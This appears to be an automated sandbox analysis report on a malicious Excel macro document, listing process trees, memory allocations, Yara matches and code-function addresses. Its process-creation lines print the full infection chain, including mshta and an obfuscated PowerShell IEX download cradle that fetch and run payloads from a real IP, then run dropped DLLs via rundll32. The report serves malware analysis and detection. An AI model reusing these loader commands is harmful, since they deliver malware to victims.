                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00357FF211_2_00357FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B3C3C13_2_003B3C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B901113_2_003B9011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C044F13_2_003C044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C20BA13_2_003C20BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BF8FD13_2_003BF8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BD6D813_2_003BD6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C473C13_2_003C473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C411613_2_003C4116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003D13AD13_2_003D13AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BAB8713_2_003BAB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C95FA13_2_003C95FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B7FF213_2_003B7FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B59F213_2_003B59F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B3E3F13_2_003B3E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CAC3A13_2_003CAC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003D0E3A13_2_003D0E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CF43513_2_003CF435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CAA3013_2_003CAA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B7C3713_2_003B7C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CC63113_2_003CC631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CBE2713_2_003CBE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003D0C1413_2_003D0C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B481613_2_003B4816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C860613_2_003C8606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C000113_2_003C0001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C907F13_2_003C907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CAE6D13_2_003CAE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CA66613_2_003CA666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B5E6013_2_003B5E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B4C5D13_2_003B4C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B205113_2_003B2051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B225113_2_003B2251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003D005613_2_003D0056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B1A5613_2_003B1A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C0E5313_2_003C0E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C6C4913_2_003C6C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B70B313_2_003B70B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BF09B13_2_003BF09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BEA9913_2_003BEA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C188913_2_003C1889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BEE8113_2_003BEE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BAEFB13_2_003BAEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CDCF713_2_003CDCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C9EEC13_2_003C9EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CA2E813_2_003CA2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B4EE313_2_003B4EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B64E213_2_003B64E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CDEDC13_2_003CDEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C66CA13_2_003C66CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BE2CC13_2_003BE2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C5CC413_2_003C5CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BB2C713_2_003BB2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B8B3D13_2_003B8B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B773513_2_003B7735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003D0F3313_2_003D0F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B6D2413_2_003B6D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CBB2313_2_003CBB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C851913_2_003C8519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C0B1913_2_003C0B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B971413_2_003B9714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BBB7E13_2_003BBB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B896913_2_003B8969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C176B13_2_003C176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B536113_2_003B5361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BA55F13_2_003BA55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CCB5B13_2_003CCB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C255013_2_003C2550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B554813_2_003B5548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BB74D13_2_003BB74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C894B13_2_003C894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BCF4713_2_003BCF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B434613_2_003B4346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B51BB13_2_003B51BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003D09B513_2_003D09B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B81B713_2_003B81B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C7BA613_2_003C7BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CC3A013_2_003CC3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CE39513_2_003CE395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BE99113_2_003BE991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CD38913_2_003CD389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B9B8313_2_003B9B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C4B8713_2_003C4B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C6DF813_2_003C6DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BDFF313_2_003BDFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CDBEA13_2_003CDBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C8BE313_2_003C8BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B2BD913_2_003B2BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C7DD513_2_003C7DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C9BCF13_2_003C9BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B9DCF13_2_003B9DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BE5CF13_2_003BE5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FF8FD14_2_001FF8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FE99114_2_001FE991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FAB8714_2_001FAB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020BE2714_2_0020BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F481614_2_001F4816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F901114_2_001F9011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020AA3014_2_0020AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020C63114_2_0020C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020F43514_2_0020F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020AC3A14_2_0020AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00210E3A14_2_00210E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F3E3F14_2_001F3E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020000114_2_00200001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F3C3C14_2_001F3C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020860614_2_00208606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F7C3714_2_001F7C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00210C1414_2_00210C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F4C5D14_2_001F4C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020A66614_2_0020A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F1A5614_2_001F1A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020AE6D14_2_0020AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F205114_2_001F2051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F225114_2_001F2251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020907F14_2_0020907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00206C4914_2_00206C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020044F14_2_0020044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00200E5314_2_00200E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0021005614_2_00210056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F5E6014_2_001F5E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FF09B14_2_001FF09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FEA9914_2_001FEA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002020BA14_2_002020BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FEE8114_2_001FEE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020188914_2_00201889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F70B314_2_001F70B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FD6D814_2_001FD6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020A2E814_2_0020A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00209EEC14_2_00209EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FE2CC14_2_001FE2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020DCF714_2_0020DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FB2C714_2_001FB2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FAEFB14_2_001FAEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00205CC414_2_00205CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002066CA14_2_002066CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020DEDC14_2_0020DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F4EE314_2_001F4EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F64E214_2_001F64E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020BB2314_2_0020BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F971414_2_001F9714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00210F3314_2_00210F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020473C14_2_0020473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F8B3D14_2_001F8B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F773514_2_001F7735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020411614_2_00204116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020851914_2_00208519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00200B1914_2_00200B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F6D2414_2_001F6D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FA55F14_2_001FA55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020176B14_2_0020176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FB74D14_2_001FB74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F554814_2_001F5548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FCF4714_2_001FCF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F434614_2_001F4346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FBB7E14_2_001FBB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020894B14_2_0020894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020255014_2_00202550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F896914_2_001F8969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020CB5B14_2_0020CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F536114_2_001F5361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020C3A014_2_0020C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00207BA614_2_00207BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002113AD14_2_002113AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002109B514_2_002109B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F9B8314_2_001F9B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F51BB14_2_001F51BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00204B8714_2_00204B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F81B714_2_001F81B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020D38914_2_0020D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020E39514_2_0020E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00208BE314_2_00208BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F2BD914_2_001F2BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020DBEA14_2_0020DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F9DCF14_2_001F9DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FE5CF14_2_001FE5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00206DF814_2_00206DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002095FA14_2_002095FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FDFF314_2_001FDFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F7FF214_2_001F7FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F59F214_2_001F59F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00209BCF14_2_00209BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00207DD514_2_00207DD5
                            Source: 4173.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                            Source: imedpub_6.xlsMacro extractor: Sheet name: REEEEEEEE
                            Source: imedpub_6.xlsMacro extractor: Sheet name: REEEEEEEE
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BE249 DeleteService,13_2_003BE249
                            Source: imedpub_6.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\imedpub_6.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Fjmda\Jump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100359C1 appears 46 times
                            Source: imedpub_6.xlsOLE indicator, VBA macros: true
                            Source: imedpub_6.xls.0.drOLE indicator, VBA macros: true
                            Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@21/12@2/48
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                            Source: imedpub_6.xlsOLE indicator, Workbook stream: true
                            Source: imedpub_6.xls.0.drOLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,9_2_100125C0
                            Source: imedpub_6.xlsReversingLabs: Detection: 18%
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................P...............................P.......................`I.........v.....................K........i.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................y0)k....................................}..v............0...............................................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................y0)k..... ..............................}..v....H.......0.................i.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................0)k....................................}..v............0...............................................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................0)k......i.............................}..v............0...............h.i.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................1)k....................................}..v....0.......0...............................................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................1)k......i.............................}..v............0.................i.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............Y.)k....E...............................}..v....p.......0.................i.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............Y.)k....E...............................}..v............0.................i.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............x.......:.......................Jump to behavior
                            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",bVGdzkK
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",ZDYuehCO
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",DllRegisterServer
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.htmlJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.htmlJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqqJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqqJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",bVGdzkKJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",DllRegisterServerJump to behavior
